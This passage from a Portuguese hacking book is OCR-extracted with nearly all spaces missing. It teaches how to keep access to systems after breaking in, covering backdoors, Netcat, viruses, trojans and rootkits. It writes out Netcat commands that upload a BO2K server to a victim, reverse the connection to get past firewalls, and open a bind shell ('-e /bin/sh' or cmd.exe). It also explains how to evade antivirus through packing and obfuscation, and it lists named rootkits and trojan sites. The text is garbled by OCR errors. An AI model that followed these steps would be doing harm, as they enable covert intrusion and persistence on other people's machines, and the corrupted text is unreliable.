Telnet!!!)efazeroqueforpreciso.EmsistemasWindowseMacintosh,como
nãoháessafacilidadeporpadrão,épossívelinstalarprogramasquepermitem
omesmocontrole.Entreeles,podemoscitarCarbonCopy,LapLink,ControlIT,
oSMSdaMicrosoftetalvezomaisconhecidodetodos:opcAnywhere,da
Symantec.Pormeiodessesprogramas,administradoresentrampelas"portas
detrás"nossistemasdosusuáriosefazemoquedeveserfeito.
Háumoutrousoparaportasdetrásemcomputadoresdomésticoseestaçõesde
trabalhocorporativas:softwaresespiões.Existemdiversossoftwares(comooI
SpyeoWmKeylogger)desenvolvidosparaquecônjugesciumentos,paisextrema-
doseempresáriosparanóicospossamvigiaroquesuascaras-metade,filhosou
empregadosandamfazendo.Passandolongedadiscussãosobreosaspectoslegais,
moraiseéticosenvolvidos,podemosafirmarqueessesprogramastambémabrem
diversasportasdetrásnossistemasemqueestãoinstalados.
Aeconomiadetempo,dinheiroerecursosgeradaporessatecnologiaéenor-
me.Bom,não?Novamente,nemtanto.Esehackersmal-intencionados(lembre-
se:hackernãoésinônimodebandido,portantooqualificadoréapropriado...)
conseguiremacessarseussistemaspormeiodessasportasdetrás?Bem,aí
temosumproblema.
Portasdetrásmaliciosas
Asoluçãoradicalparaoproblemaexpostoacimaénãousartaisprogramas
deformaalguma.Umasoluçãomaisrazoável-mas,acredite,muitovulnerável
-éaplicartodosospatchesdesegurançarecomendadospelofabricante,usar
senhasfortes,criptografiaetc.,ete.,etc.(vocêjáestácarecadesaber...).
Entretanto,mesmoemsistemasnosquaisoadministradornãoinstalou
essetipodeprograma,aameaçaexiste.Aochegaraofimdocapítuloante-
riorestávamosdentrodosistemadavítima,certo?Bem,aprimeiracoisaa
fazeréinstalarumoumaisbackdoorsparapodermosentrarnovamenteno
futuro,poiscertamenteodonodosistemairátamparoburacoporonde
passamos.Adicionalmente,podemoscorrigirtodasasvulnerabilidadesdas
máquinasqueinvadimos,impedindoquekiddiesdescuidadossedenunci-
emenoslevemdeembrulho.
JáfalamosbastantesobrebackdoorsparaWindowsnoscapítulossobre
Vulnerabilidades.EmVulnerabilidadesI,inclusive,mostramospassoapasso
comoconfigurarumBackOrifice2000(ouB02K)paracontrolarmáquinas
alheias.Nocasodessespacotesprontos,nãohámuitomaisoquefalar:são
peçascomplexasporseusmuitosrecursos,masaomesmotemposãouma
grandecoleçãoderotinassimples.Umprogramadorcomconhecimentosde
parcosamoderadosemalgumalinguagemmoderna,comoJava,VisualBasic,
1315I
]Ataque,defesaecontra-ataque:Manutenção

IUniversidadeH4CK3RI
C#,C++ouObjectivePascal(usadanoDelphi/Kylix)poderiaescreverempou-
cosdiasbackdoorstãooumaiscompletosecomplexosqueoB02K.NetBus,
Sub7,AlienToy...Alistaévasta.Mesmoprogramasdeadministraçãosérios(em
tempo:oB02Kfoidesenvolvidocomoaplicaçãoséria!)comoopcAnywhere
ouoVNCpodemserusados"paraomal".
Novamente:"Atétu,Brutus?"
Alémdasferramentasespecíficasjáexaustivamentedescritasaolongodoli-
vro,oprópriosistemaoperacionalépródigoemrecursosquepodemserusados
afavordoinvasor-econtraodonodamáquina.Comojácansamosdever,
servidoresdeTelneteFfppodemusadoscomnovascontas,especialmentecria-
daspelohackernosistemaparaposteriorinvasão(pelaportadefrente,hehehe...).
Cadasistemapossuisuaidiossincrasiaeseuconjuntodeprogramasquepodem
serusadosparafabricarumbackdoor.Alémdenaoserprecisoinstalarnada,
programasjáexistentesnocomputadorraramentelevantamsuspeitas.
Masháumpequenoutilitário,presenteemtodososUnixedisponívelparaa
famíliaWinNT,queéespecialmenteinteressanteparacriarbackdoorsimprovi-
sados.ChamadodeNetcat(www.atstake.com/researchJtools/networkutilities),
permiteinúmerostruquesemredesprivadasenaInternet-epodeserusado
comobackdoortambém!
ApesardepossuirversõesparaWindows,onomeNetcatveiodeseuprimo
cat,ocomandonoUnixparamostraroconteúdodeumarquivonoterminal.
Observe:
$catButtix
HeyBeavis,I'maUnixstring!!!
$
OcomandocatjogouoconteúdodoarquivoButtixnateladoterminal.Da
mesmaforma,ocomandoncpodejogar,deumladoaoutrodaconexão(ou
seja,nãonecessariamentenatela),oqueumadeterminadaportadeumcompu-
tadordistanteestácuspindonarede.
Asintaxemaissimpleséncip.do.computador.monitorado porta.
Porexemplo,ocomando
C:\>NC192.168.1.1180
quandoemitidoemumcomputadorWmdows,vaiconectar-seemonitorartudo
oquesaipelaporta80damáquinacujoIPé192.168.1.11.Obviamente,aporta80
temdeestaraberta,casocontráriooNetcatéabortado.Asintaxeéidênticaem
umamáquinaUnix.Naverdade,eleagecomoumclientedemãodupla-recebee
tambémtransmitedados.Nessemesmoexemplo,aoemitirocomando,nadaacon-
tece-ooutroladoestáesperandoporumaordem.Sabemosquetrata-sedeum
servidorWeb,portantobastaenviarocomandoGET(sim,precisaestartudoem
maiúsculas).Apósocomando,ocódigo-fonteHTMLdapáginainicialdoservidor
H1TPserámostradonatela.Pode-seusaroNetcatparaconectaravolumes5MB
13161
Ataque,defesaecontra-ataque:ManutençãoI

Universidade3°ano
(porta139),FfP,Telnet,SMTP...Bastaconheceroprotocoloeemitiroscomandos
corretos.Paraconectar-seaportasUDp'usa-seaopção-u.
ONetcatfuncionaemdoismodos.Omodoclienteéoquevimos
-envia
qualquercoisacolocadaemsuaentradaparaoIP/portaindicado.Sehouver
respostas,apresenta-asnatela.Porentrada,entendemostantoaentradapa-
drão(oteclado)comoqualqueroutroprogramaqueestejaacopladoàentrada
(poderíamosusarpipes
-funcionanoWindowsenoUnix).
Háumoutromodo,chamadomodoservidor.Éestequenosinteressa.Omodo
servidor,aoinvésdeenviarcomandos,ficadeprontidãopararecebê-Iosede-
volveroresultadodarequisiçãoparaasaídapadrão.Vejaoseguintecomando:
C:\>NC-1-p80
Nessecaso,oNetcatestáagindocomoservidor.Aopção-1indicaisso.A
opção-pindicaaportaaserusada.Façaumaexperiência:emnossaredede
testes,coloqueocomandoacimapararodarnamáquinaWindows.Namáqui-
naUnix,useocomandoaterior(nc192.168.1.180).Experimentedigitarna
máquinaUnixevejaoqueacontecenaWindows:oscaracteresdasuaentrada
padrão(nocaso,oseuteclado)sãotransferidosparaasaídapadrão(atela)da
outramáquina.Bacana,né?Masvamosapimentarumpoucoascoisas.
Imaginequevocêquertransferirumarquivodoseucomputadorparao
computadorinvadido(umB02K,porexemplo).Nadamaissimples.Onome
doarquivoéserver.exeeoendereçoIPdocomputadoralvoé192.168.1.1.No
computadordavítima,useocomando
De-1-p9999 >server.exe
Nodohacker,experimente
De192.168.1.19999 <server.exe
Noteosredirecionamentos.Nocomputadordavítima,ocaractere">"indica
redirecionamentoparaoarquivoserver.exe.Todososdadosrecebidosserão
copiadosparalá.Nocomputadordoatacante,ocaractere"<"indicaquetodos
osbytesdoarquivoserver.exeserãomandadosparaaentradadoNetcat.Quando
oúltimobitfortransmitido,aconexãocaiautomaticamente.Mesmosemaces-
soaFTPouaumcompartilhamentodoWindows,foipossívelenviarumarqui-
voparaosistemadavítima.Defato,mesmocomacessoirrestritoaumshelldo
sistema,oatacantenãotemacessofísicoadisquetesoudrivesdeCD(osiste-
mainvadidopodeestardooutroladodomundo).Senãohouverummeiode
enviarosarquivosviaredecomoFTP,r-comandosnoUnixecompartilhamentos
noWindows,oinvasordeveterumprograminhanamangaparapodertransfe-
ri-Ios.Aopçãomaisdiretaéobem-amadoNetcat.
Invertendoosredirecionamentos,épossíveldeixaramáquinadoatacante
comoservidorprontapara"empurrar"oarquivo,econectar-seaelapelamá-
quinadavítima,quefaráodownload.Avantagem?Bem,amaioriadasconfigu-
raçõesdefirewalliriabarrarumarquivosendotransferidoseaorigemda
1317I
]Ataque,defesaecontra-ataque:Manutenção

IUniversidadeH4CK3R I
conexãovierdefora(ouseja,damáquinadohacker).Invertendo-seospapéis,
éamáquinadavítimaquerequisitaoarquivo-eofirewallvaialegremente
deixarissoacontecer.
Namáquinadohacker:
ne-1-p9999 <server.exe
Namáquinadavítima:ne192.168.1.19999 >server.exe
Amáquinadohackerficaesperandoconexões.Quandoumaacontece,eleen-
viaoarquivoespecificado.Aconexãofoifeitaapartirdamáquinadavítima.Ela
originouaconexãoecomeçaareceberdados,quesãogravadosemserver.exe.
Masalémdeplantarbackdoors,vírusetrojansnosistemainvadido,oNetcat
podeser,elepróprio,umbackdoor!Aopção-eredirecionatudooquefor
recebidoparaumcomandoexterno!Éfácilperceberque,redirecionandopara
cmd.exenoWindowsoupara/bin/shnoUnix,oNetcatpodenosdarumshell,
queteráosprivilégiosdousuário,emqueoncfoiexecutado.Ocomando
completonamáquinadavítimaseria:
ne-1-p9999-e/bin/sh
Ou,parasistemasWindows:
NC-1-p9999-eemd.eom
Observequeaopção-epodevirdesabilitadaporpadrão.Podesernecessário
compilarocódigonovamentecomaopçãoGAPING_SECURITY_HOLE(onome
jádiztudo...)oubaixarumexecutáveljápreparadoparatal-
netcat.sourceforge.netéumagrandepedida.
HádiversosoutrosusosparaoNetcat,como,porexemplo,redirecionamento
deconexões.Éútilparafurarflfewallsouparacriarumencadeamento(daisy
chainoutunnelingmode)entrevárioscomputadoresnaInternetparafinsde
spoofing.Domesmomodoquenoencadeamentodeproxiespúblicos,podemos
usaroNetcatparamontarumarededeproxiesprivativos-15ou20namesma
linhaecomrotasalternativassãoaparatoscomunsdehackersexperientes!
OutrousomuitointeressantedoNetcatécomoportscannerimprovisado.Esses
emuitosoutrosdestinospodemserencontradosnoexcelentewhitepaperdeTom
Armstrongintitulado"Netcat-ocanivetesuíçodoTCP/IP"(www.giac.org/
practical/gseclTomArmstrongGSEC.pdf-eminglês).Umaalternativaderes-
peitoaoNetcatéoCryptCat(www.farm9.com/content/FreeTools/CryptCat).É
umdoneperfeitodoNetcat,comamesmafuncionalidadeesintaxe.Maspossui
umdiferencialinteressante:todaacomunicaçãoécriptografada.Mesmoquea
conexãosejadescoberta,nuncasaberãooquesepassanela.
ONetcaté,seguramente,aferramentaUnixnativa(emuitoinstaladaem
Windowstambém)maisusadacomoauxiliarporinvasoresemsistemasalhei-
os.Porserminúscula,éfacilmenteinstaladaemsistemasquenãoapossuem.
MasoNetcatnãoéoúnicomeiodeimprovisarbackdoors.Fiqueatentoa
quaisquerprogramasquepossamdaracessoasistemasdearquivos.O
interpretadorPerIéumdeles:compoucaslinhasdecódigoépossívelmontar
umservidorcomooNetcatemmodo-1eenviararquivosporele,porexemplo.
13181
Ataque,defesaecontra-ataque:Manutenção[

Universidade3°ano
VíruseCavalosdeTróia
Apesardeseremdoisassuntosjátratadosnodecorrerdolivro,considera-
mosbenéficorelembrarconceitosimportantes.
Maisumavez,Vírus
Nãohámuitooquefalarsobreepidemiasviraisquejánãosejamdoconhecimento
detodos.Vírussãoprogramasquesecomportamcomoseushomônimosbiológicos:
sãomicroscópicos,reproduzem-sesozinhos,consomemrecursoscomputacionais
quenãolhespertenceetêmaltacapacidadedeinfecçãoporcontágio.
Apesardeosprogramasdeantivírusclassificarem,comovírus,programas
comocavalosdetróia,backdoorse(pasmem!)víruslegítimos,astrêscategorias
deprogramassãoextremamentediferentes,epoderia-sedizeratécomplemen-
tares.OsV1fUSnãoprecisamdostrojanscomomeiodetransporteevetorde
contaminação.Muitomenosprecisamabrirbackdoorsparaentraresairdos
sistemasinfectados.Mas,apesardisso,tambémpodemutilizar-sedeles,casoa
oportunidadeapareça.
Umvírusdecomputadorpossuiobjetivosmuitoclaros:infectaromáximo
possíveldesistemas,reproduzir-serapidamenteeopcionalmenteconsumir
recursosedanificarossistemasinvadidos.
Comosãoauto-suficientes,fogeaoescopodestelivrodiscorrerafundoso-
breeles.Sugerimosaoleitorconsultarossitesdasgrandesprodutorasdeanti-
vírusparaobterinformaçõesatualizadas.
Elembre-se:umvíruspodeserocompanheiroparaumataquedeDoS...
Comotarefaparacasa,pesquisesobreosgrandesnomesdomundoviral:Ping-
Pong,Mozart,Michelangelo,Madonna,Chernobyl,Melissa,LoveLetter(conheci-
donoBrasilcomoILoveYou),Nimda,KlezeBugBear.Nocampodateoria,
estudesobreprogramaçãoorientadaaobjetos(vírusutilizam-semuitodela),
herança,polimorfismo,funçõesreprodutivasemétodosdecontágio.
Vírusaindaindetectáveis!
TomemososV1fUSmaisconhecidos.OBugBear,porexemplo.Aimprensao
descrevecomo"apiorameaçaviraldetodosostempos"(assimcomofezcom
oKlez...)e,noentanto,éumV1fUScomum,queusaasmesmastécnicasanciãs
depropagação,infecção,destruiçãoereplicaçãodeoutrosmaisantigoscomo
oMelissaequepodeserfacilmentedetectadoporumantivírusatualizado.
Virusmaismodernospodemcamuflarsuascomunicaçõescomomundoex-
ternopormeiodechamadasdesistemaecomunicaçãointerprocessos(releia
oscapítulossobresistemasoperacionais).Elespodem,porexemplo,"pegar
emprestado"ossocketsdeseunavegadorpadrãoparamascararacomunica-
ção.Ouusarseuclientedee-mailpadrão(porexemplo,oOutlookExpress
-
campeãodeaudiência)paraseautodistribuir.Emnenhumdoscasosoproces-
1319I
]Ataque,defesaecontra-ataque:Manutenção

IUniversidadeH4CK3RI
sodovirusvaiaparecerduranteacomunicação,eocomandonetstatvaireve-
larapenasumasimplesconexãoàInternetdeseuprópriobrowser.Agora
responda:quefIrewallvaibarrarcomunicaçõesH1TPouSMTPoriginadasno
ladodedentrodesuarede?
Oleitorpoderiaaindaprotestar:"masmeuantivirusestáatualizadíssimo,
comopegariavírusnovos"?Arespostaésimples:umprogramadessesdetecta
apenasvírusconhecidos.Umsimpleseditorhexadecimalpodealterardeta-
lhesdovírusetorná-Io,novamente,indetectadoporumtempo.Atéqueas
empresasqueganhamdinheirocomessetipodepânicocorramparaatualizar
seusbancosdedadoseatéqueaspessoasatualizemseusantivírus,oestrago
estáfeito.Numaestimativamuitotosca,osautoresconsideramquemaisde
90%dosvírusqueefetivamenteestãoàsoltapelomundonãosãodetectados
pornenhumdosprogramasantivírusexistentesnomercado.
Porexemplo,umadasmaneirasjábemantigasdeconfundirumantivírusé
comprimiroarquivoexecutáveldomesmoeadicionarumstub(pequenopro-
gramanoiníciodoarquivocompactado)queodescomprimanahoradaexe-
cução.Foiumamaneirainteligentede,durantemuitotempo,fazervirosespas-
saremincólumespelocorredorpolonêsimpostopelasrotinasdosantivírus.
Jáhátécnicasmodernasdeofuscamento,entretanto,quecolocamdiversas
camadasdedesafIoscomprimidosecriptografados,comdiversosstubsdife-
rentesechavesdecriptograftadistribuídaspeloarquivo.Cadavezqueéexe-
cutado,oantivírusreplica-seeseautocriptografanovamentecomoutrascha-
vescujospedaçosserãogravadosemlocaisdiferentesdentrodoarquivo.
Umantivirus,paraconseguirsimplesmenteleroconteúdoexecutáveldo
vírus,terádedescascarváriascamadasdessacebola,descobrirváriaschaves
criptográftcasembaralhadasnomeiodosdadosdoarquivoeaindasaberquais
tiposdecompressãoforamusadosemcadacamada(sim,épossívelusartipos
diferentesdecompressão).Oquenoslevaaoproblemaprincipal:depoisde
encontradoumvírusdessetipo,serãonecessáriosváriosdiasoumesmosema-
nasparaquebrá-Io.Isso,éóbvio,ocorreráapenasseoantivírusconseguirde-
terminarseaquiloéumvírus,coisamuitodifícildeacontecer.
Paramaisinformaçõessobreessastécnicasdeofuscamento,pesquisenaInternet
sobreoDaVinciGroup,umclãhackerfechadoeque,aoqueparece,éoúnico
detentordessatecnologia;emborasejabaseadaemoutrasmaisantigasquejá
estãorodandoporaífazmuitotempo.Éumasimplesquestãodevontade.Quan-
do"cairafIcha"doscrackersprodutoresdevírusparaatécnica,acomputação
comoaconhecemoshojeentraráemcolapso.
IndoalémdosCavalosdeTróia
JáconversamosrapidamentesobrecavalosdetróianocapítuloVulnerabilidadesI.
Naquelaocasião,ensinamoscomocriarumqueescondesseoB02Kemumainocente
320I
Ataque,defesaecontra-ataque:Manutenção[

Universidade3°ano
imagem.Pordefinição,oscavalosdetróiasãoapenasexpedientesutilizadosparafazer
avítimaacreditarqueoarquivoemquestãotrata-sedealgoinofensivooumesmoum
presente-emboraguardealgodanosoemsuasentranhas.
Cavalosdetróiaguardametransportamqualquercoisa-podeserum
backdoor(omaisusual),mastambémpodeserumvírus,umprogramainocen-
teoumesmooutrotrojanmaispoderoso.Docasamentoentretrojanse
backdoors,entretanto,équesaemasmaioresdoresdecabeçadosadministra-
doresdesistemaseusuáriosdomésticos...ChamadosdeRATs(Remote
AdministrationTrojans),podemtomarocontroletotaldocomputadordavíti-
ma.HámilharesdeRATsdisponíveisouemdesenvolvimentonaInternet,espe-
cialmenteparaWindows.São,emsuamaioria,desenvolvidosporkiddiesou
programadorespoucomaisqueisso,normalmenteemVisualBasicouDelphi.
Sãorealmentebrinquedos:emboraosusuárioscomunssemprecaiamnas
armadinlhasdeles.Verifiqueemareyoufearless.com.www.evileyesoftware.com
outroianforge.net(entreoutros)evejavocêmesm02.
TrojanstradicionaiscomooB02Keassemelhadospossuemmuitaslimitações.
Sãoaplicaçõese,portanto,rodamemUserMode.EnquantonoWindowsissonão
éproblemaparaoinvasor,poisoprópriokernelrodapartesdeseucódigo
nessemodo,trojanscarregandobackdoorsnãofuncionariambememoutras
plataformas.EmUnices,porexemplo,ébemprovávelqueosusuáriossequer
tenhampermissãoderodarprogramasapartirdeseusdiretóriospessoais.
Háumoutroproblemacomostrojanstradicionais:comosãoaplicativos
estranhosaosistema,sãofacilmentedetectáveis.Mesmoescondendo-secom
nomesinsuspeitosentreosarquivosdapastaC\WINDOWS,ferramentasde
auditoriapodemperfeitamenteencontrá-Ios.
Paracombateressetipodeproblema,aseleçãonaturalcriouumaespeciali-
zaçãonafaunatrojânica:asubstituiçãodeprogramasdosistemaporoutros
especialmentealterados.Chamadosderootkits,taisprogramasalteramofun-
cionamentorealdeutilitáriosdeusofreqüente,comooIbin/loginemcompu-
tadoresUnixouoEXPLORER.EXEemmáquinasWindows-FindernoMac
OS,pconsolenoNovel1Netware,etc,etc,etc..-.
Osrootkitsmaiscomunsfazem,basicamente,quatrocoisas:a)abrirum
backdoorpermanenteouativadoporumcódigo,b)mentirsobreoestadodo
sistema,c)apagaroudestruiralgumacoisa,d)descobrirsenhaseinforma-
çõessigilosas.
Agrandemaldadedeumrootkité,então,embutirumaoumaisdessasquatro
fimçõesemprogramasexistentes.Porexemplo,ojácitadoIbin/loginemsistemas
Unix.Hárootkitsquedãoacessoirrestritoaosistemacasoumasenhapré-programa-
dasejainformada.Porexemplo,emumsistemaSolaris,asenhadousuáriorooté
@#S2L9*&.Éumaboasenha,dificildequebrarouadivinhar.Entretanto,seoprogra-
2.Aliás,éumaboaidéiainterromper(novamente)aleituradolivroebrincarlongamentecomtodos
essestrojansecomasinformaçõesetutoriaispresentesnessessites.Leiaosfóruns;háthreadsinteressan-
tissimaseesclarecedoras.
1321I
]Ataque,defesaecontra-ataque:Manutenção

IUniversidadeH4CK3R I
ma/bin/loginforsubstituídoporumrootkitespecialmentepreparado,qualquer
usuáriocomasenhaespecial(quepodeserconfigurada,porexemplo,para
"xuxubeleza")ganhaacessoderootnamáquina.Umoutrotipoderootkitconheci-
doquetambémafetao/bin/loginéumsimpleskeylogger:guardaemumarquivoas
senhasdetodososusuáriosqueseconectamnosistema.Sujo,nãoacha?
UmrootkitqueafeteoWindowsExplorer,poroutrolado,podeesconder
completamenteumapastaquecontenhadiversosarquivospertencentesao
invasor.Mesmoqueavisualizaçãodearquivosocultosestejaligada,essediretório
continuaráescondido-orootkittratarádedeixá-lolongedosolhosdousuá-
rio.EnogerenciadordetarefasdoWindowsveremos,simplesmente,umains-
tânciadoExplorer.
Hárootkitsdiversosqueescondemoestadodarede,conexões,sistemade
arquivoseprocessossendorodados,entreoutrascoisas.Porexemplo,oifconfig
noLinuxpoderiamentirsobreomodopromíscuo,escondendoofunciona-
mentodeumsniffer.OTASKMAN.EXE(GerenciadordeTarefas)doWindows
poderiaesconderprocessoseserviçosdetrojans,vírusescanners.Outrosti-
posderootkitspodemecoarascomunicaçõesparaohackeroudaracesso
contornandoasenhadoadministrador -porexemplo,emservidoresSSH,Telnet
ouIISmodificados.
Aseguir,fornecemosumalista(bastanteincompleta)decomandoseprogra-
masquepodemsersubstituídosporrootkits.Existemváriosrootkitspara
cadaumdessesprogramas,portantosugiroqueoleitor,aotomarcontatocom
algonovo,experimenteemseusistemadetestes.
ParaUnix,osprogramasmaisvisadospordesenvolvedoresderootkitssão:
login,ifconfig(noLinux),du,df,pwd,su,sudo,netstat,nc(sim,opróprioNetcat
podeestaradulterado!),ps,find,slocate,updatedb.Osutilitáriosdeconfigura-
çãonãoescapamilesosarootkits:SAMnoHP-UX,AdmintoolnoSolaris,Smit
noAIX,Linuxconf,Webmin...Mesmocomandosinternosdealgunsshells
-como
lsecdnoBash-podemsermascaradoscomwrappersqueescondamarqui-
vosoumintamsobreseustamanhos.Umamalvadezamaioréinstalarversões
rootkitdosshellsdisponíveis(Bash,csh,ksh,etc)oudeservidorescomoApache
emesmoinetd/xinetdparaabrirbackdoors"sobdemanda".
ParaWindowsalistaéparecida.Oprópriocmd.compodeseralteradopara
mascararaçõesmaliciosasemfunçõesinternascomooDIReoCD.Adicional-
mente,muitosdosarquivosdoWindows,comoosjácitadosEXPLORER.EXEe
TASKMAN.EXE,podemser"torcidos".Cuidadoaindacomalgunsutilitários
freqüentementeusados,comoaCalculadora(CALC.EXE),oBlocodeNotas
(NOTEPAD.EXE),oWordPad(WRITE.EXE)eoEditordeRegistro
(REGEDIT.EXE).Todosessesprogramasestãopresentesemqualquerversão
doWindows,mesmoemservidores,epodemsermanipuladosparafuncionar
comorootkits.AtençãoespecialdeveserdadatambémàsDLLscompartilha-
daspormuitosaplicativos,especialmenteoMFC.DLL.
13221
Ataque,defesaecontra-ataque:Manutenção

Universidade3°ano
Alistaémuitomaisvastadoqueaquemostramos.Nãocaberiaaquielencar
todosostiposetodososprogramasquepodemseralteradosporrootkits.
Comosugestão,emUnixpesquisesobrelkr5,utrojan,backdooredsendmail,
tOrnkit,rkssh,APSR,bdoor,wOOwOO,IOgin.kit,bd2,vexed,falcon-ssh,Trojanit,
rootkitSunOS,sol,eRaditz(malvado:substituioTripwire!),entreoutros.
Essetipoderootkit(substituiçãodeprogramaseutilitáriosdosistema)é
maiscomumemambientesUnixdoqueemWindows,emborahajatambém
inúmerasferramentasparaosistemadaMicrosoft.Paracomeçar,procurepor
ads_cat,FakeGINA,fu.ZIp,Xshadow,HackerDefender,Hacker'sRootkitfor
NT,Slanret,Krei,IERK(ierk8243.sys),Backdoor-ALI,Caesar'sRegWriteInjector,
null.sys,HE4Root(ouHE4Hook)eIISinjection.
Parasabermaissobreessesrootkitsenovastécnicassobreotema,procure
porinformaçõesemwww.packetstormsecurity.nl,nowww.securityfocus.com,
nowww.windowsecurity.com, nositeoficialdaMicrosoft(www.micro
soft.com)e,principalmente,noGoogle;-).
Thereisnospoon
Rootkitsnãosãotãofáceisdeidentificarcomooscavalosdetróiaebackdoors
comuns.UmBackOrificeouumNetcatescutandoemumaportapodemser
facilmentedescobertoscomumsimplesnetstat.Masseonetstatestiver
rootldtted,acoisamudadefigura-ainformaçãosobreasportasabertasdo
backdoorestariamcobertas.Omesmoocorrecomosprocessos:um
EXPLORER.EXEmodificadoaindaassimapareceapenascomoWindows
ExplorernoGerenciadordeTarefas.
Entretanto,apesardemaiselaborados,rootkitscomunsquealteramafunci-
onalidadedeprogramasordináriosdosistemaoperacionalpodemserdetecta-
dosporcaracterísticasnãoóbvias,mas,mesmoassim,aparentes.Oprograma
alteradopodetersuadatadecriaçãodiferentedasdemais.Mesmoqueseja
igual,otamanhopodeserdiferentedooriginal,verificadoemoutrasmáquinas.
Seotamanhoforigual,seguramentesuaestruturainternanãooé,epodeser
comparadobyteabytecomadeumsistemasão.
Outraalternativaéverificarochecksumdosarquivosquecompõemopro-
grama.SistemasUnixnormalmenteutilizam-sedeumaassinaturaMD5para
garantiraidoneidadedosarquivos.EmsistemasWindows,aMicrosoftadota
umprocedimentosemelhante,baseadoemesteganografiaaplicadaaologotipo
doWindows.Emqualquerdoscasos,seaassinaturanãobatercomaoriginal,o
programaseguramenteestáadulteradoeprecisaserapagadoousubstituído.
Administradoresrealmenteparanóicos(eelesnãoestãoerrados,longedis-
so!)instalamcontroladoresdeinventáriocomverificadoresdeintegridadede
arquivos(comoporexemplo,oTripwireouoAIDE)emtodososseuscompu-
tadores(inclusiveestaçõesdetrabalho).Qualquerarquivoquesejaalterado
porumrootkitserádetectadonapróximaverificaçãoeumamensagemde
1323I
IAtaque,defesaecontra-ataque:Manutenção

IUniversidadeH4CK3R I
alertavermelhosurgiránateladoadministrador.
Parafugirdestecenário,oshackerscriaramumamodalidadederootkitscom
umnívelmaiselevadodecamuflagem.Destavez,osarquivoseprogramasde
sistemaficamintactos:oprópriokerneldosistemaoperacionalésubstituídopor
outrocompletamenteadulterado.UmadualidadeparecidacomadoSuper-Ho-
memeseuantiego,oBizarro(ahhh,bonstemposemquepassavaasmanhãsvendo
osSuperamigos...).
Jáfalamossobrekernelemvárioscapítulosemesmonosapêndices.Todoo
processamentodosistemaobrigatoriamentepassaporelee,portanto,controlá-Io
comoemumapossessãodemoníacaéalgoextremamentepoderosoedestrutivo.
Entreasiniqiüdadesquepodemospraticarapartirdenossapossessãoestão:
~Camuflagemdearquivosdoinvasor,exatamentecomonosrootkitsco-
muns.Adiferençaéque,sendopelokeme1,talartifícioépraticamenteimpossível
desercontornadooumesmodescoberto.
~Camuflagemdeconexõesderede.Damesmaformacomofizemos,em
UnixeemWmdows,comumaversãoalteradadocomandonetstat,umkernel
rootkittedpodetambémesconderconexõesespecíficas.Apenassniffersrodando
emoutrasmáquinassãocapazesdedetectartaisconexões.
~Camuflagemdeprocessos.Okemelgerenciaosprocessos.Oprópriokeme1,
então,équedáalistadelesparaosprogramasqueoslistam(psnoUnix,
GerenciadordeTaremsnoWmdows).Comisso,ficafácilesconderdessespro-
gramas(e,portanto,dosusuários)osprocessosnocivosqueestejamrodando.
~Redirecionamento.Imagineoseguintecenário:uminvasor"plantou"pro-
gramasnocivosnapastaC:\WINDOWS\SYSTEM32\emumsistemaWindowsNT
4.Orootkitnokerneltratadeesconderessesprogramasenquantomostranormal-
mentetodososoutrosarquivosdamesmapasta.Umdessesarquivoséumacópia
modificadadoWindowsExplorer(EXPLORER.EXE).CadavezqueoWindows
solicitaaexecuçãodeumanovainstânciadoExplorer,emvezdeabriroprograma
original,okerne1vairedirecionaraexecuçãoparaoExplorermodificado.Qual-
querferramentadeauditoriairátestaraintegridadedoEXPLORER.EXEoriginal
(armazenadonapastaC:\WINDOWS)eoencontraráintocado.
Usandoessasquatrotraquinagens,oprogramadorquedesenvolveuorootkit
podecriarduasrealidadesparaoadministradordeusuários.Uma,belaesem
problemas,écompletamentefalsa.Aoutra,cheiadefurosdesegurança,portasde
trásemanipulaçãoindevidadedocumentosearquivos,éareal.Cabeaoadminis-
tradordecidirsecontinuavivendofelizemsuaredomavirtualouseingereo
comprimidovermelho.
Alterarumkernelpormeioderootkitséfácilepodeserfeitodeduasmaneiras.
Aprimeiraépormeiodepatches,eéapreferidaporhackersquedesenvolvem
paraWmdows.FuncionandodamesmamaneiraqueosHotfixeseServicePacks
daprópriaMicrosoft,umpatchparainserirumrootkitsobrescrevearquivos
inteirosoupartedeles,injetandonovasrotinasedesviosefazendo-osrespon-
13241
Ataque,defesaecontra-ataque:Manutenção

Universidade3°ano
derdiferentementedooriginalmenteprevisto.ComookerneldoWindowsé
compostoporalgumasdezenasdeDLLsacessíveispelosusuários,atarefa,
apesardetrabalhosa,ésimpleseàsvezessequernecessitaserexecutadapor
umusuáriocommuitosprivilégiossobreosistema.Comotodainstalaçãoem
umsistemaWindows,apósaaplicaçãodopatchosistemadeveserreiniciado
-masissopodeserfeitopelopróproinvasoreemmaisde90%doscasostal
anomaliaseráconsideradapeloadministradordamáquinacomo"apenasmais
umpaunoWindows".
Aoutramaneira,maisapreciadapelosamantesdoUnix,funcionapormeio
deMódulosCarregáveisdoKernel(LoadableKernelModulesouLKM).Seo
leitornãopulouosimportantescapítulossobresistemasoperacionais,deve
lembrar-sedeque,aocontráriodomicrokerneldoWindows,osUnixemgeral
sãomonolíticos.Umúnicomamutescoeporvezescriptografadoarquivoen-.
globaonúcleocentraleamaioriadosdriversdedispositivodosistema.
ÀmedidaqueossistemasUnixiamevoluindo,percebeu-sequeapolíticade
kernelsmonolíticosdeveriaser"flexibilizada",casocontrárioteríamossiste-
mascujonúcleoresidirianumarquivodedezenasoumesmocentenasde
megabytescontendomilharesdedriversparahardwarequenuncavamosad-
quirir.Porisso,oskernelspassaramasermodulares:umnúcleobase(longede
serummicrokernel)seriacarregadoprimeiro,eosdemaisdriversapenasseri-
amcarregadosseohardwarefossesolicitado.Essesdrivers(ealgunsprogra-
maseutilitáriosquerodamemmodokernel)residememLKMs.Éfácilnotar
queépossívelalterarocomportamentodokernelcommóduloscarregados
muitodepoisdoboot.UmLKMpodeinclusivesercarregadosobdemanda,
automaticamenteouapartirdeumcomandoemitidoremotamentepeloinva-
soratravésdeumbackdoorcomum.
PesquisesobreosLKMrootkitsdeseusistemaoperacionale,preferencial-
mentetestetodososqueencontrar(emnossarededetestesenãoemambien-
tedeprodução!!!).Relacionamosalgunsmaisfamosos(ouinformaçõespara
entenderLKMsnasdiversasplataformas),masintencionalmentenãocoloca-
mososmaisrecentesparaacostumá-Ioaprocurar.
ParaWindows(9xeNT):www.rootkit.com(passagemobrigatória).
ParaLinux:Adore,Carogna(prOgetoCarOnte),Knark,phide,heroine.c,
spooflkm,suidshow.c,kinsmod,Rial,THCBackdoor(lkm),kernel.keylogger,
SucKlT,1kminject;
ParaSolaris:Plasmoid,slkm,ksolaris,THCBackdoor(1km);
